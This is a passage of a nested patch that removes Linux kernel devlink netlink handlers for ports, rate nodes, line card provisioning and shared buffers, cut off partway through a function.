+-static int devlink_nl_cmd_port_get_dumpit(struct sk_buff *msg,
+-					  struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	struct devlink_port *devlink_port;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(devlink_port, &devlink->port_list, list) {
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_port_fill(msg, devlink_port,
+-						   DEVLINK_CMD_NEW,
+-						   NETLINK_CB(cb->skb).portid,
+-						   cb->nlh->nlmsg_seq,
+-						   NLM_F_MULTI, cb->extack);
+-			if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_port_type_set(struct devlink_port *devlink_port,
+-				 enum devlink_port_type port_type)
+-
+-{
+-	int err;
+-
+-	if (!devlink_port->devlink->ops->port_type_set)
+-		return -EOPNOTSUPP;
+-
+-	if (port_type == devlink_port->type)
+-		return 0;
+-
+-	err = devlink_port->devlink->ops->port_type_set(devlink_port,
+-							port_type);
+-	if (err)
+-		return err;
+-
+-	devlink_port->desired_type = port_type;
+-	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
+-	return 0;
+-}
+-
+-static int devlink_port_function_hw_addr_set(struct devlink_port *port,
+-					     const struct nlattr *attr,
+-					     struct netlink_ext_ack *extack)
+-{
+-	const struct devlink_ops *ops = port->devlink->ops;
+-	const u8 *hw_addr;
+-	int hw_addr_len;
+-
+-	hw_addr = nla_data(attr);
+-	hw_addr_len = nla_len(attr);
+-	if (hw_addr_len > MAX_ADDR_LEN) {
+-		NL_SET_ERR_MSG_MOD(extack, "Port function hardware address too long");
+-		return -EINVAL;
+-	}
+-	if (port->type == DEVLINK_PORT_TYPE_ETH) {
+-		if (hw_addr_len != ETH_ALEN) {
+-			NL_SET_ERR_MSG_MOD(extack, "Address must be 6 bytes for Ethernet device");
+-			return -EINVAL;
+-		}
+-		if (!is_unicast_ether_addr(hw_addr)) {
+-			NL_SET_ERR_MSG_MOD(extack, "Non-unicast hardware address unsupported");
+-			return -EINVAL;
+-		}
+-	}
+-
+-	if (!ops->port_function_hw_addr_set) {
+-		NL_SET_ERR_MSG_MOD(extack, "Port doesn't support function attributes");
+-		return -EOPNOTSUPP;
+-	}
+-
+-	return ops->port_function_hw_addr_set(port, hw_addr, hw_addr_len,
+-					      extack);
+-}
+-
+-static int devlink_port_fn_state_set(struct devlink_port *port,
+-				     const struct nlattr *attr,
+-				     struct netlink_ext_ack *extack)
+-{
+-	enum devlink_port_fn_state state;
+-	const struct devlink_ops *ops;
+-
+-	state = nla_get_u8(attr);
+-	ops = port->devlink->ops;
+-	if (!ops->port_fn_state_set) {
+-		NL_SET_ERR_MSG_MOD(extack,
+-				   "Function does not support state setting");
+-		return -EOPNOTSUPP;
+-	}
+-	return ops->port_fn_state_set(port, state, extack);
+-}
+-
+-static int devlink_port_function_set(struct devlink_port *port,
+-				     const struct nlattr *attr,
+-				     struct netlink_ext_ack *extack)
+-{
+-	struct nlattr *tb[DEVLINK_PORT_FUNCTION_ATTR_MAX + 1];
+-	int err;
+-
+-	err = nla_parse_nested(tb, DEVLINK_PORT_FUNCTION_ATTR_MAX, attr,
+-			       devlink_function_nl_policy, extack);
+-	if (err < 0) {
+-		NL_SET_ERR_MSG_MOD(extack, "Fail to parse port function attributes");
+-		return err;
+-	}
+-
+-	attr = tb[DEVLINK_PORT_FUNCTION_ATTR_HW_ADDR];
+-	if (attr) {
+-		err = devlink_port_function_hw_addr_set(port, attr, extack);
+-		if (err)
+-			return err;
+-	}
+-	/* Keep this as the last function attribute set, so that when
+-	 * multiple port function attributes are set along with state,
+-	 * Those can be applied first before activating the state.
+-	 */
+-	attr = tb[DEVLINK_PORT_FN_ATTR_STATE];
+-	if (attr)
+-		err = devlink_port_fn_state_set(port, attr, extack);
+-
+-	if (!err)
+-		devlink_port_notify(port, DEVLINK_CMD_PORT_NEW);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_port_set_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	int err;
+-
+-	if (info->attrs[DEVLINK_ATTR_PORT_TYPE]) {
+-		enum devlink_port_type port_type;
+-
+-		port_type = nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_TYPE]);
+-		err = devlink_port_type_set(devlink_port, port_type);
+-		if (err)
+-			return err;
+-	}
+-
+-	if (info->attrs[DEVLINK_ATTR_PORT_FUNCTION]) {
+-		struct nlattr *attr = info->attrs[DEVLINK_ATTR_PORT_FUNCTION];
+-		struct netlink_ext_ack *extack = info->extack;
+-
+-		err = devlink_port_function_set(devlink_port, attr, extack);
+-		if (err)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_port_split_doit(struct sk_buff *skb,
+-					  struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	struct devlink *devlink = info->user_ptr[0];
+-	u32 count;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PORT_SPLIT_COUNT))
+-		return -EINVAL;
+-	if (!devlink->ops->port_split)
+-		return -EOPNOTSUPP;
+-
+-	count = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_SPLIT_COUNT]);
+-
+-	if (!devlink_port->attrs.splittable) {
+-		/* Split ports cannot be split. */
+-		if (devlink_port->attrs.split)
+-			NL_SET_ERR_MSG_MOD(info->extack, "Port cannot be split further");
+-		else
+-			NL_SET_ERR_MSG_MOD(info->extack, "Port cannot be split");
+-		return -EINVAL;
+-	}
+-
+-	if (count < 2 || !is_power_of_2(count) || count > devlink_port->attrs.lanes) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "Invalid split count");
+-		return -EINVAL;
+-	}
+-
+-	return devlink->ops->port_split(devlink, devlink_port, count,
+-					info->extack);
+-}
+-
+-static int devlink_nl_cmd_port_unsplit_doit(struct sk_buff *skb,
+-					    struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	struct devlink *devlink = info->user_ptr[0];
+-
+-	if (!devlink->ops->port_unsplit)
+-		return -EOPNOTSUPP;
+-	return devlink->ops->port_unsplit(devlink, devlink_port, info->extack);
+-}
+-
+-static int devlink_port_new_notify(struct devlink *devlink,
+-				   unsigned int port_index,
+-				   struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	lockdep_assert_held(&devlink->lock);
+-	devlink_port = devlink_port_get_by_index(devlink, port_index);
+-	if (!devlink_port) {
+-		err = -ENODEV;
+-		goto out;
+-	}
+-
+-	err = devlink_nl_port_fill(msg, devlink_port, DEVLINK_CMD_NEW,
+-				   info->snd_portid, info->snd_seq, 0, NULL);
+-	if (err)
+-		goto out;
+-
+-	return genlmsg_reply(msg, info);
+-
+-out:
+-	nlmsg_free(msg);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_port_new_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink_port_new_attrs new_attrs = {};
+-	struct devlink *devlink = info->user_ptr[0];
+-	unsigned int new_port_index;
+-	int err;
+-
+-	if (!devlink->ops->port_new || !devlink->ops->port_del)
+-		return -EOPNOTSUPP;
+-
+-	if (!info->attrs[DEVLINK_ATTR_PORT_FLAVOUR] ||
+-	    !info->attrs[DEVLINK_ATTR_PORT_PCI_PF_NUMBER]) {
+-		NL_SET_ERR_MSG_MOD(extack, "Port flavour or PCI PF are not specified");
+-		return -EINVAL;
+-	}
+-	new_attrs.flavour = nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_FLAVOUR]);
+-	new_attrs.pfnum =
+-		nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_PCI_PF_NUMBER]);
+-
+-	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
+-		/* Port index of the new port being created by driver. */
+-		new_attrs.port_index =
+-			nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
+-		new_attrs.port_index_valid = true;
+-	}
+-	if (info->attrs[DEVLINK_ATTR_PORT_CONTROLLER_NUMBER]) {
+-		new_attrs.controller =
+-			nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_CONTROLLER_NUMBER]);
+-		new_attrs.controller_valid = true;
+-	}
+-	if (new_attrs.flavour == DEVLINK_PORT_FLAVOUR_PCI_SF &&
+-	    info->attrs[DEVLINK_ATTR_PORT_PCI_SF_NUMBER]) {
+-		new_attrs.sfnum = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_PCI_SF_NUMBER]);
+-		new_attrs.sfnum_valid = true;
+-	}
+-
+-	err = devlink->ops->port_new(devlink, &new_attrs, extack,
+-				     &new_port_index);
+-	if (err)
+-		return err;
+-
+-	err = devlink_port_new_notify(devlink, new_port_index, info);
+-	if (err && err != -ENODEV) {
+-		/* Fail to send the response; destroy newly created port. */
+-		devlink->ops->port_del(devlink, new_port_index, extack);
+-	}
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_port_del_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink *devlink = info->user_ptr[0];
+-	unsigned int port_index;
+-
+-	if (!devlink->ops->port_del)
+-		return -EOPNOTSUPP;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PORT_INDEX)) {
+-		NL_SET_ERR_MSG_MOD(extack, "Port index is not specified");
+-		return -EINVAL;
+-	}
+-	port_index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
+-
+-	return devlink->ops->port_del(devlink, port_index, extack);
+-}
+-
+-static int
+-devlink_nl_rate_parent_node_set(struct devlink_rate *devlink_rate,
+-				struct genl_info *info,
+-				struct nlattr *nla_parent)
+-{
+-	struct devlink *devlink = devlink_rate->devlink;
+-	const char *parent_name = nla_data(nla_parent);
+-	const struct devlink_ops *ops = devlink->ops;
+-	size_t len = strlen(parent_name);
+-	struct devlink_rate *parent;
+-	int err = -EOPNOTSUPP;
+-
+-	parent = devlink_rate->parent;
+-	if (parent && len) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "Rate object already has parent.");
+-		return -EBUSY;
+-	} else if (parent && !len) {
+-		if (devlink_rate_is_leaf(devlink_rate))
+-			err = ops->rate_leaf_parent_set(devlink_rate, NULL,
+-							devlink_rate->priv, NULL,
+-							info->extack);
+-		else if (devlink_rate_is_node(devlink_rate))
+-			err = ops->rate_node_parent_set(devlink_rate, NULL,
+-							devlink_rate->priv, NULL,
+-							info->extack);
+-		if (err)
+-			return err;
+-
+-		refcount_dec(&parent->refcnt);
+-		devlink_rate->parent = NULL;
+-	} else if (!parent && len) {
+-		parent = devlink_rate_node_get_by_name(devlink, parent_name);
+-		if (IS_ERR(parent))
+-			return -ENODEV;
+-
+-		if (parent == devlink_rate) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "Parent to self is not allowed");
+-			return -EINVAL;
+-		}
+-
+-		if (devlink_rate_is_node(devlink_rate) &&
+-		    devlink_rate_is_parent_node(devlink_rate, parent->parent)) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "Node is already a parent of parent node.");
+-			return -EEXIST;
+-		}
+-
+-		if (devlink_rate_is_leaf(devlink_rate))
+-			err = ops->rate_leaf_parent_set(devlink_rate, parent,
+-							devlink_rate->priv, parent->priv,
+-							info->extack);
+-		else if (devlink_rate_is_node(devlink_rate))
+-			err = ops->rate_node_parent_set(devlink_rate, parent,
+-							devlink_rate->priv, parent->priv,
+-							info->extack);
+-		if (err)
+-			return err;
+-
+-		refcount_inc(&parent->refcnt);
+-		devlink_rate->parent = parent;
+-	}
+-
+-	return 0;
+-}
+-
+-static int devlink_nl_rate_set(struct devlink_rate *devlink_rate,
+-			       const struct devlink_ops *ops,
+-			       struct genl_info *info)
+-{
+-	struct nlattr *nla_parent, **attrs = info->attrs;
+-	int err = -EOPNOTSUPP;
+-	u64 rate;
+-
+-	if (attrs[DEVLINK_ATTR_RATE_TX_SHARE]) {
+-		rate = nla_get_u64(attrs[DEVLINK_ATTR_RATE_TX_SHARE]);
+-		if (devlink_rate_is_leaf(devlink_rate))
+-			err = ops->rate_leaf_tx_share_set(devlink_rate, devlink_rate->priv,
+-							  rate, info->extack);
+-		else if (devlink_rate_is_node(devlink_rate))
+-			err = ops->rate_node_tx_share_set(devlink_rate, devlink_rate->priv,
+-							  rate, info->extack);
+-		if (err)
+-			return err;
+-		devlink_rate->tx_share = rate;
+-	}
+-
+-	if (attrs[DEVLINK_ATTR_RATE_TX_MAX]) {
+-		rate = nla_get_u64(attrs[DEVLINK_ATTR_RATE_TX_MAX]);
+-		if (devlink_rate_is_leaf(devlink_rate))
+-			err = ops->rate_leaf_tx_max_set(devlink_rate, devlink_rate->priv,
+-							rate, info->extack);
+-		else if (devlink_rate_is_node(devlink_rate))
+-			err = ops->rate_node_tx_max_set(devlink_rate, devlink_rate->priv,
+-							rate, info->extack);
+-		if (err)
+-			return err;
+-		devlink_rate->tx_max = rate;
+-	}
+-
+-	nla_parent = attrs[DEVLINK_ATTR_RATE_PARENT_NODE_NAME];
+-	if (nla_parent) {
+-		err = devlink_nl_rate_parent_node_set(devlink_rate, info,
+-						      nla_parent);
+-		if (err)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-static bool devlink_rate_set_ops_supported(const struct devlink_ops *ops,
+-					   struct genl_info *info,
+-					   enum devlink_rate_type type)
+-{
+-	struct nlattr **attrs = info->attrs;
+-
+-	if (type == DEVLINK_RATE_TYPE_LEAF) {
+-		if (attrs[DEVLINK_ATTR_RATE_TX_SHARE] && !ops->rate_leaf_tx_share_set) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "TX share set isn't supported for the leafs");
+-			return false;
+-		}
+-		if (attrs[DEVLINK_ATTR_RATE_TX_MAX] && !ops->rate_leaf_tx_max_set) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "TX max set isn't supported for the leafs");
+-			return false;
+-		}
+-		if (attrs[DEVLINK_ATTR_RATE_PARENT_NODE_NAME] &&
+-		    !ops->rate_leaf_parent_set) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "Parent set isn't supported for the leafs");
+-			return false;
+-		}
+-	} else if (type == DEVLINK_RATE_TYPE_NODE) {
+-		if (attrs[DEVLINK_ATTR_RATE_TX_SHARE] && !ops->rate_node_tx_share_set) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "TX share set isn't supported for the nodes");
+-			return false;
+-		}
+-		if (attrs[DEVLINK_ATTR_RATE_TX_MAX] && !ops->rate_node_tx_max_set) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "TX max set isn't supported for the nodes");
+-			return false;
+-		}
+-		if (attrs[DEVLINK_ATTR_RATE_PARENT_NODE_NAME] &&
+-		    !ops->rate_node_parent_set) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "Parent set isn't supported for the nodes");
+-			return false;
+-		}
+-	} else {
+-		WARN(1, "Unknown type of rate object");
+-		return false;
+-	}
+-
+-	return true;
+-}
+-
+-static int devlink_nl_cmd_rate_set_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink_rate *devlink_rate = info->user_ptr[1];
+-	struct devlink *devlink = devlink_rate->devlink;
+-	const struct devlink_ops *ops = devlink->ops;
+-	int err;
+-
+-	if (!ops || !devlink_rate_set_ops_supported(ops, info, devlink_rate->type))
+-		return -EOPNOTSUPP;
+-
+-	err = devlink_nl_rate_set(devlink_rate, ops, info);
+-
+-	if (!err)
+-		devlink_rate_notify(devlink_rate, DEVLINK_CMD_RATE_NEW);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_rate_new_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_rate *rate_node;
+-	const struct devlink_ops *ops;
+-	int err;
+-
+-	ops = devlink->ops;
+-	if (!ops || !ops->rate_node_new || !ops->rate_node_del) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "Rate nodes aren't supported");
+-		return -EOPNOTSUPP;
+-	}
+-
+-	if (!devlink_rate_set_ops_supported(ops, info, DEVLINK_RATE_TYPE_NODE))
+-		return -EOPNOTSUPP;
+-
+-	rate_node = devlink_rate_node_get_from_attrs(devlink, info->attrs);
+-	if (!IS_ERR(rate_node))
+-		return -EEXIST;
+-	else if (rate_node == ERR_PTR(-EINVAL))
+-		return -EINVAL;
+-
+-	rate_node = kzalloc(sizeof(*rate_node), GFP_KERNEL);
+-	if (!rate_node)
+-		return -ENOMEM;
+-
+-	rate_node->devlink = devlink;
+-	rate_node->type = DEVLINK_RATE_TYPE_NODE;
+-	rate_node->name = nla_strdup(info->attrs[DEVLINK_ATTR_RATE_NODE_NAME], GFP_KERNEL);
+-	if (!rate_node->name) {
+-		err = -ENOMEM;
+-		goto err_strdup;
+-	}
+-
+-	err = ops->rate_node_new(rate_node, &rate_node->priv, info->extack);
+-	if (err)
+-		goto err_node_new;
+-
+-	err = devlink_nl_rate_set(rate_node, ops, info);
+-	if (err)
+-		goto err_rate_set;
+-
+-	refcount_set(&rate_node->refcnt, 1);
+-	list_add(&rate_node->list, &devlink->rate_list);
+-	devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_NEW);
+-	return 0;
+-
+-err_rate_set:
+-	ops->rate_node_del(rate_node, rate_node->priv, info->extack);
+-err_node_new:
+-	kfree(rate_node->name);
+-err_strdup:
+-	kfree(rate_node);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_rate_del_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink_rate *rate_node = info->user_ptr[1];
+-	struct devlink *devlink = rate_node->devlink;
+-	const struct devlink_ops *ops = devlink->ops;
+-	int err;
+-
+-	if (refcount_read(&rate_node->refcnt) > 1) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "Node has children. Cannot delete node.");
+-		return -EBUSY;
+-	}
+-
+-	devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_DEL);
+-	err = ops->rate_node_del(rate_node, rate_node->priv, info->extack);
+-	if (rate_node->parent)
+-		refcount_dec(&rate_node->parent->refcnt);
+-	list_del(&rate_node->list);
+-	kfree(rate_node->name);
+-	kfree(rate_node);
+-	return err;
+-}
+-
+-struct devlink_linecard_type {
+-	const char *type;
+-	const void *priv;
+-};
+-
+-static int devlink_nl_linecard_fill(struct sk_buff *msg,
+-				    struct devlink *devlink,
+-				    struct devlink_linecard *linecard,
+-				    enum devlink_command cmd, u32 portid,
+-				    u32 seq, int flags,
+-				    struct netlink_ext_ack *extack)
+-{
+-	struct devlink_linecard_type *linecard_type;
+-	struct nlattr *attr;
+-	void *hdr;
+-	int i;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_LINECARD_INDEX, linecard->index))
+-		goto nla_put_failure;
+-	if (nla_put_u8(msg, DEVLINK_ATTR_LINECARD_STATE, linecard->state))
+-		goto nla_put_failure;
+-	if (linecard->type &&
+-	    nla_put_string(msg, DEVLINK_ATTR_LINECARD_TYPE, linecard->type))
+-		goto nla_put_failure;
+-
+-	if (linecard->types_count) {
+-		attr = nla_nest_start(msg,
+-				      DEVLINK_ATTR_LINECARD_SUPPORTED_TYPES);
+-		if (!attr)
+-			goto nla_put_failure;
+-		for (i = 0; i < linecard->types_count; i++) {
+-			linecard_type = &linecard->types[i];
+-			if (nla_put_string(msg, DEVLINK_ATTR_LINECARD_TYPE,
+-					   linecard_type->type)) {
+-				nla_nest_cancel(msg, attr);
+-				goto nla_put_failure;
+-			}
+-		}
+-		nla_nest_end(msg, attr);
+-	}
+-
+-	if (linecard->nested_devlink &&
+-	    devlink_nl_put_nested_handle(msg, linecard->nested_devlink))
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static void devlink_linecard_notify(struct devlink_linecard *linecard,
+-				    enum devlink_command cmd)
+-{
+-	struct devlink *devlink = linecard->devlink;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_LINECARD_NEW &&
+-		cmd != DEVLINK_CMD_LINECARD_DEL);
+-
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_linecard_fill(msg, devlink, linecard, cmd, 0, 0, 0,
+-				       NULL);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
+-				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static int devlink_nl_cmd_linecard_get_doit(struct sk_buff *skb,
+-					    struct genl_info *info)
+-{
+-	struct devlink_linecard *linecard = info->user_ptr[1];
+-	struct devlink *devlink = linecard->devlink;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	mutex_lock(&linecard->state_lock);
+-	err = devlink_nl_linecard_fill(msg, devlink, linecard,
+-				       DEVLINK_CMD_LINECARD_NEW,
+-				       info->snd_portid, info->snd_seq, 0,
+-				       info->extack);
+-	mutex_unlock(&linecard->state_lock);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int devlink_nl_cmd_linecard_get_dumpit(struct sk_buff *msg,
+-					      struct netlink_callback *cb)
+-{
+-	struct devlink_linecard *linecard;
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		mutex_lock(&devlink->linecards_lock);
+-		list_for_each_entry(linecard, &devlink->linecard_list, list) {
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			mutex_lock(&linecard->state_lock);
+-			err = devlink_nl_linecard_fill(msg, devlink, linecard,
+-						       DEVLINK_CMD_LINECARD_NEW,
+-						       NETLINK_CB(cb->skb).portid,
+-						       cb->nlh->nlmsg_seq,
+-						       NLM_F_MULTI,
+-						       cb->extack);
+-			mutex_unlock(&linecard->state_lock);
+-			if (err) {
+-				mutex_unlock(&devlink->linecards_lock);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		mutex_unlock(&devlink->linecards_lock);
+-		devlink_put(devlink);
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static struct devlink_linecard_type *
+-devlink_linecard_type_lookup(struct devlink_linecard *linecard,
+-			     const char *type)
+-{
+-	struct devlink_linecard_type *linecard_type;
+-	int i;
+-
+-	for (i = 0; i < linecard->types_count; i++) {
+-		linecard_type = &linecard->types[i];
+-		if (!strcmp(type, linecard_type->type))
+-			return linecard_type;
+-	}
+-	return NULL;
+-}
+-
+-static int devlink_linecard_type_set(struct devlink_linecard *linecard,
+-				     const char *type,
+-				     struct netlink_ext_ack *extack)
+-{
+-	const struct devlink_linecard_ops *ops = linecard->ops;
+-	struct devlink_linecard_type *linecard_type;
+-	int err;
+-
+-	mutex_lock(&linecard->state_lock);
+-	if (linecard->state == DEVLINK_LINECARD_STATE_PROVISIONING) {
+-		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being provisioned");
+-		err = -EBUSY;
+-		goto out;
+-	}
+-	if (linecard->state == DEVLINK_LINECARD_STATE_UNPROVISIONING) {
+-		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being unprovisioned");
+-		err = -EBUSY;
+-		goto out;
+-	}
+-
+-	linecard_type = devlink_linecard_type_lookup(linecard, type);
+-	if (!linecard_type) {
+-		NL_SET_ERR_MSG_MOD(extack, "Unsupported line card type provided");
+-		err = -EINVAL;
+-		goto out;
+-	}
+-
+-	if (linecard->state != DEVLINK_LINECARD_STATE_UNPROVISIONED &&
+-	    linecard->state != DEVLINK_LINECARD_STATE_PROVISIONING_FAILED) {
+-		NL_SET_ERR_MSG_MOD(extack, "Line card already provisioned");
+-		err = -EBUSY;
+-		/* Check if the line card is provisioned in the same
+-		 * way the user asks. In case it is, make the operation
+-		 * to return success.
+-		 */
+-		if (ops->same_provision &&
+-		    ops->same_provision(linecard, linecard->priv,
+-					linecard_type->type,
+-					linecard_type->priv))
+-			err = 0;
+-		goto out;
+-	}
+-
+-	linecard->state = DEVLINK_LINECARD_STATE_PROVISIONING;
+-	linecard->type = linecard_type->type;
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	mutex_unlock(&linecard->state_lock);
+-	err = ops->provision(linecard, linecard->priv, linecard_type->type,
+-			     linecard_type->priv, extack);
+-	if (err) {
+-		/* Provisioning failed. Assume the linecard is unprovisioned
+-		 * for future operations.
+-		 */
+-		mutex_lock(&linecard->state_lock);
+-		linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
+-		linecard->type = NULL;
+-		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-		mutex_unlock(&linecard->state_lock);
+-	}
+-	return err;
+-
+-out:
+-	mutex_unlock(&linecard->state_lock);
+-	return err;
+-}
+-
+-static int devlink_linecard_type_unset(struct devlink_linecard *linecard,
+-				       struct netlink_ext_ack *extack)
+-{
+-	int err;
+-
+-	mutex_lock(&linecard->state_lock);
+-	if (linecard->state == DEVLINK_LINECARD_STATE_PROVISIONING) {
+-		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being provisioned");
+-		err = -EBUSY;
+-		goto out;
+-	}
+-	if (linecard->state == DEVLINK_LINECARD_STATE_UNPROVISIONING) {
+-		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being unprovisioned");
+-		err = -EBUSY;
+-		goto out;
+-	}
+-	if (linecard->state == DEVLINK_LINECARD_STATE_PROVISIONING_FAILED) {
+-		linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
+-		linecard->type = NULL;
+-		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-		err = 0;
+-		goto out;
+-	}
+-
+-	if (linecard->state == DEVLINK_LINECARD_STATE_UNPROVISIONED) {
+-		NL_SET_ERR_MSG_MOD(extack, "Line card is not provisioned");
+-		err = 0;
+-		goto out;
+-	}
+-	linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONING;
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	mutex_unlock(&linecard->state_lock);
+-	err = linecard->ops->unprovision(linecard, linecard->priv,
+-					 extack);
+-	if (err) {
+-		/* Unprovisioning failed. Assume the linecard is unprovisioned
+-		 * for future operations.
+-		 */
+-		mutex_lock(&linecard->state_lock);
+-		linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
+-		linecard->type = NULL;
+-		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-		mutex_unlock(&linecard->state_lock);
+-	}
+-	return err;
+-
+-out:
+-	mutex_unlock(&linecard->state_lock);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_linecard_set_doit(struct sk_buff *skb,
+-					    struct genl_info *info)
+-{
+-	struct devlink_linecard *linecard = info->user_ptr[1];
+-	struct netlink_ext_ack *extack = info->extack;
+-	int err;
+-
+-	if (info->attrs[DEVLINK_ATTR_LINECARD_TYPE]) {
+-		const char *type;
+-
+-		type = nla_data(info->attrs[DEVLINK_ATTR_LINECARD_TYPE]);
+-		if (strcmp(type, "")) {
+-			err = devlink_linecard_type_set(linecard, type, extack);
+-			if (err)
+-				return err;
+-		} else {
+-			err = devlink_linecard_type_unset(linecard, extack);
+-			if (err)
+-				return err;
+-		}
+-	}
+-
+-	return 0;
+-}
+-
+-static int devlink_nl_sb_fill(struct sk_buff *msg, struct devlink *devlink,
+-			      struct devlink_sb *devlink_sb,
+-			      enum devlink_command cmd, u32 portid,
+-			      u32 seq, int flags)
+-{
+-	void *hdr;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_SIZE, devlink_sb->size))
+-		goto nla_put_failure;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_INGRESS_POOL_COUNT,
+-			devlink_sb->ingress_pools_count))
+-		goto nla_put_failure;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_EGRESS_POOL_COUNT,
+-			devlink_sb->egress_pools_count))
+-		goto nla_put_failure;
